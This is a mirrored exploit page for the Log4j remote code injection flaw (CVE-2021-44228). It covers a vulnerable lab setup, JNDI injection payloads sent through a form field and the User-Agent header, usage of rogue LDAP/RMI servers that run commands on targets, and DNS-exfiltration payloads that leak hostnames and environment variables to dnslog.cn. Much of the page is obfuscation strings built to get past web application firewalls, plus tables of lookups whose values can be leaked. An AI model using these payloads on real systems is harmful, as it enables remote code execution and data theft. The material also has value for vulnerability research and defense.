Share
## https://sploitus.com/exploit?id=473FFDA9-E615-53B6-9A81-F98A1ABD700E
# CVE-2021-44228 Remote Code Injection In Log4j

https://twitter.com/jas502n/status/1468946197629272066

![image](https://user-images.githubusercontent.com/16593068/145523576-e1198f04-c216-4a25-97dc-9f8c030951bc.png)

### SpringBoot-pom.xml

default use :

``` xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
</dependency>
```

 **mvn dependency:tree**
 
```java
[INFO] |  |  +- org.springframework.boot:spring-boot-starter-logging:jar:2.6.1:compile
[INFO] |  |  |  +- ch.qos.logback:logback-classic:jar:1.2.7:compile
[INFO] |  |  |  |  \- ch.qos.logback:logback-core:jar:1.2.7:compile
[INFO] |  |  |  +- org.apache.logging.log4j:log4j-to-slf4j:jar:2.14.1:compile
[INFO] |  |  |  \- org.slf4j:jul-to-slf4j:jar:1.7.32:compile  
[INFO] |  |  \- org.slf4j:slf4j-api:jar:1.7.32:compile 
```

change pom.xml
```xml


<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
    <exclusions>
        <exclusion>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-logging</artifactId>
        </exclusion>
    </exclusions>
</dependency>

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>
```

## 漏洞环境使用

usage:
![image](https://user-images.githubusercontent.com/16593068/145543534-53d6f867-04e1-46c6-bcf0-39d5a6fded94.png)



```
$ java -jar log4jRCE-0.0.1-SNAPSHOT.jar    

[*] CVE-2021-44228 Log4j2 Remote Code Injection

  .   ____          _            __ _ _
 /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
 \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
  '  |____| .__|_| |_|_| |_\__, | / / / /
 =========|_|==============|___/=/_/_/_/
 :: Spring Boot ::                (v2.6.1)

2021-12-10 16:18:43.099  WARN 48536 --- [           main] o.s.boot.StartupInfoLogger               : InetAddress.getLocalHost().getHostName() took 5005 milliseconds to respond. Please verify your network configuration (macOS machines may need to add entries to /etc/hosts).
2021-12-10 16:18:48.108  INFO 48536 --- [           main] c.example.log4jrce.Log4jRceApplication   : Starting Log4jRceApplication v0.0.1-SNAPSHOT using Java 1.8.0_60 on JMacBookPro.local with PID 48536 (/Users/jas502n/IdeaProjects/log4jRCE/target/log4jRCE-0.0.1-SNAPSHOT.jar started by root in log4jRCE/target)
2021-12-10 16:18:48.109  INFO 48536 --- [           main] c.example.log4jrce.Log4jRceApplication   : No active profile set, falling back to default profiles: default
2021-12-10 16:18:48.890  INFO 48536 --- [           main] o.s.b.w.embedded.tomcat.TomcatWebServer  : Tomcat initialized with port(s): 8080 (http)
2021-12-10 16:18:48.902  INFO 48536 --- [           main] o.apache.catalina.core.StandardService   : Starting service [Tomcat]
2021-12-10 16:18:48.902  INFO 48536 --- [           main] org.apache.catalina.core.StandardEngine  : Starting Servlet engine: [Apache Tomcat/9.0.55]
2021-12-10 16:18:48.957  INFO 48536 --- [           main] o.a.c.c.C.[Tomcat].[localhost].[/]       : Initializing Spring embedded WebApplicationContext

```

#### Burpsuite Send
![image](https://user-images.githubusercontent.com/16593068/145543467-401fd2bb-24e6-4d93-b01d-ae92e71597fa.png)


```
POST /login HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

data=xxxxx
```

```
HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8
Content-Length: 15
Date: Fri, 10 Dec 2021 08:38:50 GMT
Connection: close

log4j2 success!
```

#### User-Agent Injection

![image](https://user-images.githubusercontent.com/16593068/146004276-890f3e28-ca37-47b7-9e19-a1d344331a7f.png)

```bash
GET / HTTP/1.1
Host: 192.168.3.105:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=reference} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.3.105:18080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

HTTP/1.1 200 
Content-Type: image/avif;charset=UTF-8
Content-Length: 26
Date: Tue, 14 Dec 2021 13:08:14 GMT
Connection: close

User-Agent Inject Success!
```

Example: JDK jdk8-202

![image](https://user-images.githubusercontent.com/16593068/146010100-8aa88736-6b75-40a3-9326-d0047b06ada4.png)


![image](https://user-images.githubusercontent.com/16593068/146006938-ed2a41ad-b920-42d5-9a7f-c94117fe04b4.png)


![image](https://user-images.githubusercontent.com/16593068/146009768-d103612b-d8b1-47e8-a910-c16e7c517f11.png)

```java
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=tomcat} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

2021-12-14 21:18:08.810  INFO 50619 --- [io-18080-exec-2] c.e.l.Log4jRceApplication                : >>> Mozilla/5.0 (Windows NT 10.0; Win64; x64)javax.el.ELProcessor@7d97214f AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36


User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)${jndi:ldap://192.168.3.105:1389/o=groovy} AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36

2021-12-14 21:19:34.516  INFO 50619 --- [io-18080-exec-3] c.e.l.Log4jRceApplication                : >>> Mozilla/5.0 (Windows NT 10.0; Win64; x64)groovy.lang.GroovyShell@383ad44e AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
```

![image](https://user-images.githubusercontent.com/16593068/146006180-a200b871-ecab-4ae1-9357-d1f83cad02b3.png)


### Fix log4j2 Tips By Default Properites

默认 Map 预先填充了 **hostName** 的值,该值是当前系统的主机名或IP地址,

参考文档:https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-configuration.html

`org.apache.logging.log4j.core.LoggerContext#setConfiguration`

![image](https://user-images.githubusercontent.com/16593068/145687343-c6ac3d6f-bf89-4206-b60d-abab4cf4d162.png)
![image](https://user-images.githubusercontent.com/16593068/145687556-2d489143-399d-4e4d-8d23-51b9af4c7975.png)


```
${hostName}
${env:COMPUTERNAME}
${env:USERDOMAIN}
${env:LOGONSERVER}
```

Example:

```
// log4j2 Default,For(Windows、Linux、macOS....)
${jndi:dns://${hostName}.iwk5r1.dnslog.cn}

// Equivalent to windows command(set|findstr your-hostname)
${jndi:dns://${env:COMPUTERNAME}.iwk5r1.dnslog.cn}
${jndi:dns://${env:USERDOMAIN}.iwk5r1.dnslog.cn}
```

![image](https://user-images.githubusercontent.com/16593068/145687507-06565f49-9799-4dfd-aa00-d5873dc70221.png)


### log4j for configLocation

log4j: Log4j 配置属性。

表达式 `${log4j:configLocation}` 和 `${log4j:configParentLocation}` 分别提供了 `log4j 配置文件` 及其`父文件夹`的`绝对路径`。

```
${log4j:configLocation}

/xxx/apache-tomcat/webapps/xxxx/WEB-INF/classes/log4j2.xml
```

```
${log4j:configParentLocation}
/xxx/apache-tomcat/webapps/xxxx/WEB-INF/classes/
```


### JNDIExploit-Tools

01-feihong-cs/JNDIExploit

https://github.com/feihong-cs/JNDIExploit

usage:

```java

$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps_ip -p 8082                                                                                                                                         
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8082...
```

02-welk1n/JNDI-Injection-Exploit

https://github.com/welk1n/JNDI-Injection-Exploit

usage:

```java
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a calculator" -A vip_ip
[ADDRESS] >> vip_ip
[COMMAND] >> open -a calculator
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://vip_ip:1099/x6sufy
ldap://vip_ip:1389/x6sufy
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://vip_ip:1099/gh4u9h
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://vip_ip:1099/kwoimv
ldap://vip_ip:1389/kwoimv
```
03-veracode-research/rogue-jndi

https://github.com/veracode-research/rogue-jndi

usage:

```java

$ java -jar target/RogueJndi-1.1.jar --command "calc" --hostname "vip_ip"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://vip_ip:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://vip_ip:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://vip_ip:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://vip_ip:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://vip_ip:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://vip_ip:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://vip_ip:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://vip_ip:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
```

04-welk1n/JNDI-Injection-Bypass

https://github.com/welk1n/JNDI-Injection-Bypass

usage:

```bash
$ java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer vip_ip                                                
Creating evil RMI registry on port 1097
```

```xml
// Expression Language 3.0.0 API-Apr, 2013

<!-- https://mvnrepository.com/artifact/javax.el/javax.el-api -->
<dependency>
    <groupId>javax.el</groupId>
    <artifactId>javax.el-api</artifactId>
    <version>3.0.0</version>
</dependency>

// Apache Groovy 3.0.0: A powerful, dynamic language for the JVM

<!-- https://mvnrepository.com/artifact/org.codehaus.groovy/groovy -->
<dependency>
    <groupId>org.codehaus.groovy</groupId>
    <artifactId>groovy</artifactId>
    <version>3.0.0</version>
</dependency>
```

#### USE ${lower:xxx} or ${upper:xxx} or {::-n} Bypass Waf


use `"ı".toUpperCase()` bypass I >>> `JNDI` >> `${JND${upper:ı}`

![image](https://user-images.githubusercontent.com/16593068/146028025-ca7ae13c-568d-47a3-beef-b7812da5dc39.png)

https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html


other:

```
[>] jndi inject model start...
[+] Raw payload:

${jndi:dns://${hostName}.b2hp8r.dnslog.cn}

[+] {[upper|lower]:x} Random obfuscate:

${${upper:j}nd${lower:i}:${lower:d}${lower:n}s://${h${lower:o}st${upper:N}ame}.b2${lower:h}p8r.${lower:d}nsl${lower:o}${lower:g}${lower:.}cn}

${${upper:j}nd${lower:i}:${lower:d}${lower:n}s://${h${lower:o}st${upper:n}ame}.b2${lower:h}p8r.${lower:d}nsl${lower:o}${lower:g}${lower:.}cn}

[+] {[upper|lower]:x} all the obfuscate:

${${upper:j}${lower:n}${lower:d}${lower:i}${lower::}${lower:d}${lower:n}${lower:s}${lower::}${lower:/}${lower:/}${${lower:h}${lower:o}${lower:s}${lower:t}${upper:N}${lower:a}${lower:m}${lower:e}}${lower:.}${lower:b}${lower:2}${lower:h}${lower:p}${lower:8}${lower:r}${lower:.}${lower:d}${lower:n}${lower:s}${lower:l}${lower:o}${lower:g}${lower:.}${lower:c}${lower:n}}
${${upper:j}${lower:n}${lower:d}${lower:i}${lower::}${lower:d}${lower:n}${lower:s}${lower::}${lower:/}${lower:/}${${lower:h}${lower:o}${lower:s}${lower:t}${upper:n}${lower:a}${lower:m}${lower:e}}${lower:.}${lower:b}${lower:2}${lower:h}${lower:p}${lower:8}${lower:r}${lower:.}${lower:d}${lower:n}${lower:s}${lower:l}${lower:o}${lower:g}${lower:.}${lower:c}${lower:n}}

[+] {::-n} random obfuscate:

${j${zG:xuc:-n}d${wXuN:-i}:dns:/${emWDv:Jdq:-/}${${RfdM:txf:-h}o${O:atnIDv:-s}${O:YM:sdm:fP:DPYEXx:-t}${fiShn:P:NA:-N}${v:h:rLVoL:-a}me}.b2${Ld:Tnzo:-h}p${cCC:-8}r${aoq:FF:-.}dnslog.${GL:-c}n}


[+] {::-n} all the obfuscate:

${${ogEqGS:RDg:fUxz:-j}${ldB:E:N:PG:-n}${VzvPou:-d}${lr:oRfT:-i}${nw:-:}${j:-d}${EcFIy:YQUG:zKWwP:jNq:DjGp:-n}${sjydOt:S:eCS:QQ:xRDd:-s}${nLj:F:TptB:-:}${WqfK:rWy:YVXz:-/}${jyvggg:wrwT:hp:-/}${${Pw:-h}${R:-o}${Y:bhV:-s}${sNr:Oiv:RBRrv:ISrLbB:rCBSw:-t}${h:JeAg:-N}${Se:L:dxEa:Ssx:-a}${HYtfSz:AInf:gHTSJ:LkD:Wxqq:-m}${uxdytq:-e}}${EBxUv:wf:UmUc:dIDP:-.}${k:x:Fq:muQmwT:-b}${XioYP:Qc:-2}${Gnr:NY:-h}${YhRuP:tIAVJ:W:-p}${veLxt:pVKX:MPGdO:lNo:LXWtN:-8}${NqPAoG:lhEirn:QhJOS:QIMJ:-r}${wx:-.}${H:wA:UTu:s:TwBzM:-d}${VGlR:CXlxMV:PSJ:-n}${b:wMDG:wn:PjYam:-s}${Nmdg:y:sNnW:-l}${rF:GRmC:-o}${RkV:QRb:-g}${LDBWIn:dMxv:-.}${pNgiK:az:arNf:-c}${OgV:XPTn:-n}}

[=] jndi inject model stop
```
https://github.com/woodpecker-appstore/log4j-payload-generator

![image](https://user-images.githubusercontent.com/16593068/145920763-fc21e00d-c2a1-4d87-801d-b0fe1f399df0.png)


#### log4j-::

Example:
```

${::-n}
2021-12-14 11:08:49.287 ERROR 31355 --- [io-18080-exec-4] c.e.l.Log4jRceApplication : >>> n

${xxx::-n}
2021-12-14 11:07:24.785 ERROR 31355 --- [io-18080-exec-1] c.e.l.Log4jRceApplication : >>> n

${:xxx:-n}
2021-12-14 11:08:18.012 ERROR 31355 --- [io-18080-exec-3] c.e.l.Log4jRceApplication : >>> n

${:-n}
2021-12-14 11:11:10.135 ERROR 31355 --- [io-18080-exec-3] c.e.l.Log4jRceApplication : >>> n

${:-jndi}
2021-12-14 11:10:43.420 ERROR 31355 --- [io-18080-exec-1] c.e.l.Log4jRceApplication : >>> jndi

```

#### log4j-lower

```java
this.strLookupMap.put("lower", new LowerLookup());
```

**org.apache.logging.log4j.core.lookup.LowerLookup#lookup(org.apache.logging.log4j.core.LogEvent, java.lang.String)**

```java
package org.apache.logging.log4j.core.lookup;
import org.apache.logging.log4j.core.LogEvent;
import org.apache.logging.log4j.core.config.plugins.Plugin;
@Plugin(
    name = "lower",
    category = "Lookup"
)
public class LowerLookup implements StrLookup {
    public LowerLookup() {
    }
    public String lookup(final String key) {
        return key != null ? key.toLowerCase() : null; // toLowerCase()
    }
    public String lookup(final LogEvent event, final String key) {
        return this.lookup(key);
    }
}
```

Example:

```java
data=${lower:JNDI}
2021-12-14 10:05:12.051 ERROR 31355 --- [io-18080-exec-6] c.e.l.Log4jRceApplication                : >>> jndi
```

#### log4j-upper

```java
this.strLookupMap.put("upper", new UpperLookup());
```

**org.apache.logging.log4j.core.lookup.UpperLookup#lookup(org.apache.logging.log4j.core.LogEvent, java.lang.String)**

```java
package org.apache.logging.log4j.core.lookup;
import org.apache.logging.log4j.core.LogEvent;
import org.apache.logging.log4j.core.config.plugins.Plugin;
@Plugin(
    name = "upper",
    category = "Lookup"
)
public class UpperLookup implements StrLookup {
    public UpperLookup() {
    }
    public String lookup(final String key) {
        return key != null ? key.toUpperCase() : null;
    }
    public String lookup(final LogEvent event, final String key) {
        return this.lookup(key);
    }
}
```

Example:

```java
data=${upper:jndi}
2021-12-14 10:08:29.286 ERROR 31355 --- [io-18080-exec-8] c.e.l.Log4jRceApplication                : >>> JNDI
```


#### log4j-java

| ID   | usage | method |
| ---- | ----- | ------ |
|1|${java:version}|getSystemProperty("java.version")|
|2|${java:runtime}|getRuntime()|
|3|${java:vm}|getVirtualMachine()|
|4|${java:os}|getOperatingSystem()|
|5|${java:hw}|getHardware()|
|6|${java:locale}|getLocale()|

**org.apache.logging.log4j.core.lookup.JavaLookup**

```java

    public String getHardware() {
        return "processors: " + Runtime.getRuntime().availableProcessors() + ", architecture: " + this.getSystemProperty("os.arch") + this.getSystemProperty("-", "sun.arch.data.model") + this.getSystemProperty(", instruction sets: ", "sun.cpu.isalist");
    }

    public String getLocale() {
        return "default locale: " + Locale.getDefault() + ", platform encoding: " + this.getSystemProperty("file.encoding");
    }

    public String getOperatingSystem() {
        return this.getSystemProperty("os.name") + " " + this.getSystemProperty("os.version") + this.getSystemProperty(" ", "sun.os.patch.level") + ", architecture: " + this.getSystemProperty("os.arch") + this.getSystemProperty("-", "sun.arch.data.model");
    }

    public String getRuntime() {
        return this.getSystemProperty("java.runtime.name") + " (build " + this.getSystemProperty("java.runtime.version") + ") from " + this.getSystemProperty("java.vendor");
    }

    private String getSystemProperty(final String name) {
        return this.spLookup.lookup(name);
    }

    public String getVirtualMachine() {
        return this.getSystemProperty("java.vm.name") + " (build " + this.getSystemProperty("java.vm.version") + ", " + this.getSystemProperty("java.vm.info") + ")";
    }
```

##### log4j2-env

###### Linux:

```properties
CLASSPATH,HOME,JAVA_HOME,LANG,LC_TERMINAL,LC_TERMINAL_VERSION,LESS,LOGNAME,LSCOLORS,LS_COLORS,MAIL,NLSPATH,OLDPWD,PAGER,PATH,PWD,SHELL,SHLVL,SSH_CLIENT,SSH_CONNECTION,SSH_TTY,TERM,USER,XDG_RUNTIME_DIR,XDG_SESSION_ID,XFILESEARCHPATH,ZSH,_
```

| id   | usage |
| ---- | ----- |
|1|${env:CLASSPATH}|
|2|${env:HOME}|
|3|${env:JAVA_HOME}|
|4|${env:LANG}|
|5|${env:LC_TERMINAL}|
|6|${env:LC_TERMINAL_VERSION}|
|7|${env:LESS}|
|8|${env:LOGNAME}|
|9|${env:LSCOLORS}|
|10|${env:LS_COLORS}|
|11|${env:MAIL}|
|12|${env:NLSPATH}|
|13|${env:OLDPWD}|
|14|${env:PAGER}|
|15|${env:PATH}|
|16|${env:PWD}|
|17|${env:SHELL}|
|18|${env:SHLVL}|
|19|${env:SSH_CLIENT}|
|20|${env:SSH_CONNECTION}|
|21|${env:SSH_TTY}|
|22|${env:TERM}|
|23|${env:USER}|
|24|${env:XDG_RUNTIME_DIR}|
|25|${env:XDG_SESSION_ID}|
|26|${env:XFILESEARCHPATH}|
|27|${env:ZSH}|


###### Windows:

```properties
=E:,=ExitCode,A8_HOME,A8_ROOT_BIN,ALLUSERSPROFILE,APPDATA,CATALINA_BASE,CATALINA_HOME,CATALINA_OPTS,CATALINA_TMPDIR,CLASSPATH,CLIENTNAME,COMPUTERNAME,ComSpec,CommonProgramFiles,CommonProgramFiles(x86),CommonProgramW6432,FP_NO_HOST_CHECK,HOMEDRIVE,HOMEPATH,JRE_HOME,Java_Home,LOCALAPPDATA,LOGONSERVER,NUMBER_OF_PROCESSORS,OS,PATHEXT,PROCESSOR_ARCHITECTURE,PROCESSOR_IDENTIFIER,PROCESSOR_LEVEL,PROCESSOR_REVISION,PROMPT,PSModulePath,PUBLIC,Path,ProgramData,ProgramFiles,ProgramFiles(x86),ProgramW6432,SESSIONNAME,SystemDrive,SystemRoot,TEMP,TMP,ThisExitCode,USERDOMAIN,USERNAME,USERPROFILE,WORK_PATH,windir,windows_tracing_flags,windows_tracing_logfile
```

| id   | usage |
| ---- | ----- |
|1|${env:A8_HOME}|
|2|${env:A8_ROOT_BIN}|
|3|${env:ALLUSERSPROFILE}|
|4|${env:APPDATA}|
|5|${env:CATALINA_BASE}|
|6|${env:CATALINA_HOME}|
|7|${env:CATALINA_OPTS}|
|8|${env:CATALINA_TMPDIR}|
|9|${env:CLASSPATH}|
|10|${env:CLIENTNAME}|
|11|${env:COMPUTERNAME}|
|12|${env:ComSpec}|
|13|${env:CommonProgramFiles}|
|14|${env:CommonProgramFiles(x86)}|
|15|${env:CommonProgramW6432}|
|16|${env:FP_NO_HOST_CHECK}|
|17|${env:HOMEDRIVE}|
|18|${env:HOMEPATH}|
|19|${env:JRE_HOME}|
|20|${env:Java_Home}|
|21|${env:LOCALAPPDATA}|
|22|${env:LOGONSERVER}|
|23|${env:NUMBER_OF_PROCESSORS}|
|24|${env:OS}|
|25|${env:PATHEXT}|
|26|${env:PROCESSOR_ARCHITECTURE}|
|27|${env:PROCESSOR_IDENTIFIER}|
|28|${env:PROCESSOR_LEVEL}|
|29|${env:PROCESSOR_REVISION}|
|30|${env:PROMPT}|
|31|${env:PSModulePath}|
|32|${env:PUBLIC}|
|33|${env:Path}|
|34|${env:ProgramData}|
|35|${env:ProgramFiles}|
|36|${env:ProgramFiles(x86)}|
|37|${env:ProgramW6432}|
|38|${env:SESSIONNAME}|
|39|${env:SystemDrive}|
|40|${env:SystemRoot}|
|41|${env:TEMP}|
|42|${env:TMP}|
|43|${env:ThisExitCode}|
|44|${env:USERDOMAIN}|
|45|${env:USERNAME}|
|46|${env:USERPROFILE}|
|47|${env:WORK_PATH}|
|48|${env:windir}|
|49|${env:windows_tracing_flags}|
|50|${env:windows_tracing_logfile}|


###### Mac:

```properties
ANT_HOME,COMMAND_MODE,GOBIN,GOPATH,GOROOT,GRADLE_HOME,HOME,HOMEBREW_BOTTLE_DOMAIN,JAVA_HOME,JAVA_MAIN_CLASS_3651,LC_CTYPE,LESS,LOGNAME,LSCOLORS,LaunchInstanceID,OLDPWD,PAGER,PATH,PWD,SECURITYSESSIONID,SHELL,SSH_AUTH_SOCK,TIME_STYLE,TMPDIR,USER,VERSIONER_PYTHON_VERSION,XPC_FLAGS,XPC_SERVICE_NAME,ZSH,__CF_USER_TEXT_ENCODING
```

| id   | usage |
| ---- | ----- |
|1|${env:ANT_HOME}|
|2|${env:COMMAND_MODE}|
|3|${env:GOBIN}|
|4|${env:GOPATH}|
|5|${env:GOROOT}|
|6|${env:GRADLE_HOME}|
|7|${env:HOME}|
|8|${env:HOMEBREW_BOTTLE_DOMAIN}|
|9|${env:JAVA_HOME}|
|10|${env:JAVA_MAIN_CLASS_3651}|
|11|${env:LC_CTYPE}|
|12|${env:LESS}|
|13|${env:LOGNAME}|
|14|${env:LSCOLORS}|
|15|${env:LaunchInstanceID}|
|16|${env:OLDPWD}|
|17|${env:PAGER}|
|18|${env:PATH}|
|19|${env:PWD}|
|20|${env:SECURITYSESSIONID}|
|21|${env:SHELL}|
|22|${env:SSH_AUTH_SOCK}|
|23|${env:TIME_STYLE}|
|24|${env:TMPDIR}|
|25|${env:USER}|
|26|${env:VERSIONER_PYTHON_VERSION}|
|27|${env:XPC_FLAGS}|
|28|${env:XPC_SERVICE_NAME}|
|29|${env:ZSH}|



##### log4j2-sys

| id   | usage |
| ---- | ----- |
|1|${sys:awt.toolkit}|
|2|${sys:file.encoding}|
|3|${sys:file.encoding.pkg}|
|4|${sys:file.separator}|
|5|${sys:java.awt.graphicsenv}|
|6|${sys:java.awt.printerjob}|
|7|${sys:java.class.path}|
|8|${sys:java.class.version}|
|9|${sys:java.endorsed.dirs}|
|10|${sys:java.ext.dirs}|
|11|${sys:java.home}|
|12|${sys:java.io.tmpdir}|
|13|${sys:java.library.path}|
|14|${sys:java.runtime.name}|
|15|${sys:java.runtime.version}|
|16|${sys:java.specification.name}|
|17|${sys:java.specification.vendor}|
|18|${sys:java.specification.version}|
|19|${sys:java.vendor}|
|20|${sys:java.vendor.url}|
|21|${sys:java.vendor.url.bug}|
|22|${sys:java.version}|
|23|${sys:java.vm.info}|
|24|${sys:java.vm.name}|
|25|${sys:java.vm.specification.name}|
|26|${sys:java.vm.specification.vendor}|
|27|${sys:java.vm.specification.version}|
|28|${sys:java.vm.vendor}|
|29|${sys:java.vm.version}|
|30|${sys:line.separator}|
|31|${sys:os.arch}|
|32|${sys:os.name}|
|33|${sys:os.version}|
|34|${sys:path.separator}|
|35|${sys:sun.arch.data.model}|
|36|${sys:sun.boot.class.path}|
|37|${sys:sun.boot.library.path}|
|38|${sys:sun.cpu.endian}|
|39|${sys:sun.cpu.isalist}|
|40|${sys:sun.desktop}|
|41|${sys:sun.io.unicode.encoding}|
|42|${sys:sun.java.command}|
|43|${sys:sun.java.launcher}|
|44|${sys:sun.jnu.encoding}|
|45|${sys:sun.management.compiler}|
|46|${sys:sun.os.patch.level}|
|47|${sys:sun.stderr.encoding}|
|48|${sys:user.country}|
|49|${sys:user.dir}|
|50|${sys:user.home}|
|51|${sys:user.language}|
|52|${sys:user.name}|
|53|${sys:user.script}|
|54|${sys:user.timezone}|
|55|${sys:user.variant}|